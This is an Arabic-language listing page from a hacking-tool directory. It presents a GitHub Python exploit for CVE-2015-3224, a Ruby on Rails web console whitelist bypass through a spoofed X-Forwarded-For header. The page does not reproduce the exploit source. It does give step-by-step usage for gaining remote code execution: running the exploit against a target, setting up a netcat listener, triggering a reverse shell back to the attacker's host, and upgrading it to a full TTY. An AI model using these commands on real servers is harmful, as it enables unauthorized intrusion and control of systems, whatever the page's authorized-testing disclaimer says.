Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-3224 — استغلال وحدة تحكم ويب Ruby on Rails (CVE-2015-3224) | Kitploit
أدوات/GitHubGitHub/sic4rio/cve-2015-3224
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

استغلال وحدة تحكم ويب Ruby on Rails (CVE-2015-3224)

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة استغلال وحدة التحكم في Ruby on Rails (CVE-2015-3224)

CVE-2015-3224

يحتوي هذا المستودع على نص برمجي بلغة Python لاستغلال ثغرة تجاوز القائمة البيضاء لعناوين IP في وحدة التحكم الخاصة بالمطور في Ruby on Rails 4.0.x و 4.1.x. يسمح النص البرمجي بـ تنفيذ أكواد عن بُعد على الخوادم الضعيفة.

⚠️ إخلاء مسؤولية هذا النص البرمجي لأغراض تعليمية واختبار الأمان المصرح به فقط. لا تستخدمه على أي نظام دون إذن صريح. المؤلفون غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا النص البرمجي.


📌 وصف الثغرة

وحدة التحكم في الويب في الإصدارات الضعيفة من Ruby on Rails مخصصة لأغراض التطوير ويجب أن تكون متاحة فقط من عناوين IP موثوقة. ومع ذلك، بسبب المعالجة غير الصحيحة لرأس HTTP X-Forwarded-For، يمكن للمهاجم تزوير عنوان IP الخاص به ليظهر كمستخدم محلي موثوق (مثل 127.0.0.1 أو ::1). يؤدي ذلك إلى تجاوز القائمة البيضاء لعناوين IP ومنح وصول غير مصرح به إلى وحدة التحكم، مما يؤدي إلى تنفيذ أكواد عن بُعد.


🚀 الميزات

  • سهل الاستخدام: واجهة سطر أوامر بسيطة.
  • اكتشاف المسار الديناميكي: يفحص الهدف تلقائيًا للعثور على مسار جلسة التحكم الديناميكي.
  • وضعان للصدفة:
    • صدفة بسيطة: صدفة أساسية غير تفاعلية للأوامر السريعة.
    • صدفة TTY عكسية: أمر من سطر واحد للحصول على صدفة عكسية PTY تفاعلية بالكامل.
  • وضوح محسَّن: مخرجات ملونة لرسائل الحالة والنجاح والأخطاء.
  • متين: يتضمن معالجة الأخطاء لمشاكل الشبكة والأوامر الفاشلة.

✅ المتطلبات

  • Python 3
  • مكتبة requests

تثبيت requests:

root@kitploit:~
pip install requests

⚙️ الاستخدام

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. جعل النص البرمجي قابلاً للتنفيذ:

    root@kitploit:~
    chmod +x exploit.py
    

الخيار 1: صدفة تفاعلية بسيطة

هذا الوضع مفيد لتشغيل أوامر سريعة وبسيطة.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

الخيار 2: صدفة TTY تفاعلية كاملة (صدفة عكسية)

هذا هو الوضع الموصى به للحصول على صدفة مستقرة وتفاعلية بالكامل.

الخطوة 1: تشغيل مستمع

على جهازك المحلي، افتح محطة طرفية جديدة وشغّل مستمع netcat.

root@kitploit:~
nc -lvnp 9001

الخطوة 2: تشغيل الأداة

في محطة طرفية أخرى، شغّل النص البرمجي مع العلامة --rev-shell، مع توفير عنوان IP المحلي (lhost) والمنفذ (lport).

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

الخطوة 3: تثبيت الصدفة

سيصل اتصال إلى مستمع netcat الخاص بك. لترقيته إلى صدفة TTY تفاعلية بالكامل، اتبع هذه الخطوات في نافذة netcat:

  1. ضع الصدفة في الخلفية بالضغط على Ctrl+Z.
  2. اضبط محطتك المحلية على الوضع الخام وأحضر الصدفة إلى المقدمة.
    root@kitploit:~
    stty raw -echo; fg
    
    اضغط Enter إذا لم يظهر الموجه مرة أخرى.
  3. اضبط خصائص المحطة على الصدفة البعيدة.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

لديك الآن صدفة مستقرة وكاملة الوظائف!


👥 الإسنادات

  • الاستغلال الأصلي: Eval (@0xEval)
  • ملف Readme.md: GPT
تنزيل الأداة